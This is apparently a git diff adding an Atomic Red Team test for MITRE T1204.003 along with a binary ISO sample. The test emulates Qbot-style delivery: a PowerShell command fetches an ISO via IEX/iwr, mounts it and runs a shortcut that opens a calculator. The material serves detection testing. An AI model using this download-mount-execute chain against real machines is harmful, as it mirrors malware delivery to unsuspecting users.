diff --git a/atomics/T1204.003/T1204.003.yaml b/atomics/T1204.003/T1204.003.yaml
new file mode 100644
index 00000000..03f9c840
--- /dev/null
+++ b/atomics/T1204.003/T1204.003.yaml
@@ -0,0 +1,21 @@
+attack_technique: T1204.003
+display_name: "User Execution: Malicious Image"
+atomic_tests:
+- name: Malicious Execution from Mounted ISO Image
+  description: Adversaries may rely on a user running a malicious image to facilitate execution
+  supported_platforms:
+  - windows
+  executor:
+    command: |-
+      IEX (iwr "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.003/src/qbot-test.iso" -OutFile "$env:TEMP\qbot-test.iso")
+      Mount-DiskImage -ImagePath "$env:TEMP\qbot-test.iso"
+      $mountedpath = (Get-DiskImage -ImagePath "$env:TEMP\qbot-test.iso" | Get-Volume).DriveLetter
+      $finalpath = $mountedpath + ":\"
+      cd $finalpath
+      .\calc.exe.lnk
+    cleanup_command: |-
+      start-sleep -s 5
+      stop-process -Name "Calculatorapp" -Force 
+      dismount-diskimage -ImagePath "$env:TEMP\qbot-test.iso"
+    name: powershell
+    elevation_required: true
\ No newline at end of file
diff --git a/atomics/T1204.003/src/qbot-test.iso b/atomics/T1204.003/src/qbot-test.iso
new file mode 100644
index 00000000..23b2b11b
Binary files /dev/null and b/atomics/T1204.003/src/qbot-test.iso differ